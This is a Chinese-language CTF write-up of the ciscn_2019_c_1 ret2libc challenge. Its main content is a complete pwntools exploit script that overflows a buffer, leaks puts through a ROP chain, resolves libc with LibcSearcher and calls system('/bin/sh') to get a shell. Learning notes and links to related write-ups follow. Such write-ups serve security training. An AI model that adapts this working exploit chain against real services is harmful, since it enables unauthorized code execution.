ciscn_2019_c

经典ret2libc，着实恶心到我了。前后捣鼓了将近3、4个小时，勉强把原理理解透彻。
边做题边C语言：艹！

输入字符串s加密逻辑：
1、如果是小写字母跟0xD异或
2、如果是大写字母跟0xE异或
3、如果是数字跟0xF异或
[ASCII码对照表]：(http://c.biancheng.net/c/ascii/)

LibcSearcher工具：https://github.com/dev2ero/LibcSearcher

from pwn import *
from LibcSearcher import *context(os = 'linux', arch = 'amd64', log_level = 'debug')# io = process('ciscn_2019_c_1')
io = remote('redirect.do-not-trust.hacking.run', 10312)
elf = ELF('./ciscn_2019_c_1')
// 本地换了多个版本libc打
# libc = ELF('./libc-2.27.so')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.symbols['main']# ROPgadget --binary ciscn_2019_c_1 --only 'pop|ret'
pop_rdi_ret = 0x0000000000400c83
# ROPgadget --binary ciscn_2019_c_1 --only 'ret'
ret_addr = 0x00000000004006b9io.sendlineafter('Input your choice!\n', '1')
// '\0'用来strlen函数绕过，防止输入加密字符串s被加密，第一个payload用来获得libc
# payload = b'\0' + b'a' * (0x50 + 0x08 - 0x01) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
payload = b'a' * 0x58 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter('Input your Plaintext to be encrypted\n', payload)
# io.recvuntil('Ciphertext\n')
io.recvline()
io.recvline()
// 接收puts函数打印回显值，截取低三位，分页机制导致libc后三位恒不变，加以区分。
# puts_addr = u64(io.recv(7)[:-1].ljust(8,b'\x00'))
# puts_addr = u64(io.recvuntil('\n',drop=True).ljust(8,b'\x00'))
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))// 工具获取libc版本号并计算偏移值，然后计算后门函数内存地址。
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
// 本地libc计算相应内存地址。
# libc_base = puts_addr - libc.symbols['puts']
# system_addr = libc_base + libc.symbols['system']
# binsh_addr = libc_base + libc.search('/bin/sh').next()io.sendlineafter('Input your choice!\n', b'1')
// 第二个payload用来获取shell，高版本libc加上ret来平衡堆栈。
payload7 = b'\0' + b'a' * (0x50 + 0x08 - 0x01) + p64(ret_addr) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
# payload7 = b'\0' + b'a' * (0x50 + 0x08 - 0x01) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
# payload7 = b'a' * 0x58 + p64(ret_addr) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
sleep(1)
io.sendlineafter('encrypted\n', payload7)# io.shutdown('send')
io.interactive()

[栈平衡和栈转移(Stack-Pivot) | 偏有宸机 (gitee.io)]：(https://oneda1sy.gitee.io/2020/02/24/stack-balance/)

思考：
1、32位和64位泄露libc的payload和shell的payload如何构造；
2、libc低三位决定版本号的原因：分页机制；
3、完整逆向程序，看懂代码逻辑；
4、栈平衡原理；
5、plt和got表，延迟绑定机制；
6、bug、bug、bug，炸裂再修补；
7、忍不住爆句粗口，

ciscn_2019_c_1相关推荐

[BUUCTF-pwn]——ciscn_2019_c_1
[BUUCTF-pwn]--ciscn_2019_c_1 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1 题目: 下载下来checksec一下再IDA ...
BUUCTF ciscn_2019_c_1
一道积攒了很久才解出来的题,这道题大体不难,但是好多小细节呜呜呜.而且Libcsearcher里的libc库没更新(上篇博客讲了). 这道题是BUUCTF上的ciscn_2019_c_1.标准的64位 ...
[buuuctf]ciscn_2019_c_1
[buuuctf]ciscn_2019_c_1 解题思路查壳 ida中查看逻辑等信息脚本解题思路查壳第一步也就是查壳,拖入软件中,之后获得到了这个是64位的软件. ida中查看逻辑等信息先 ...
Buuctf(PWN)ciscn_2019_c_1
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函 ...
ciscn_2019_c_1 1
payload构造此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的.因此,payload的构造方式不一样. payload1 此时的esp正处于函数返回的状态,即从上 ...
PWN-PRACTICE-BUUCTF-4
PWN-PRACTICE-BUUCTF-4 ciscn_2019_en_2 bjdctf_2020_babystack not_the_same_3dsctf_2016 [HarekazeCTF201 ...
PWN-PRACTICE-BUUCTF-2
PWN-PRACTICE-BUUCTF-2 pwn1_sctf_2016 jarvisoj_level0 ciscn_2019_c_1 [第五空间2019 决赛]PWN5 pwn1_sctf_2016 ...
持续更新 BUUCTF——PWN（一）
文章目录前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
BUUCTF PWN 刷题 1-15题
1 rip 经典栈溢出漏洞. from pwn import *p = remote('node4.buuoj.cn', 27181)payload = b'a' * 23 + p64(0x40118 ...

ciscn_2019_c_1

ciscn_2019_c_1相关推荐

最新文章

热门文章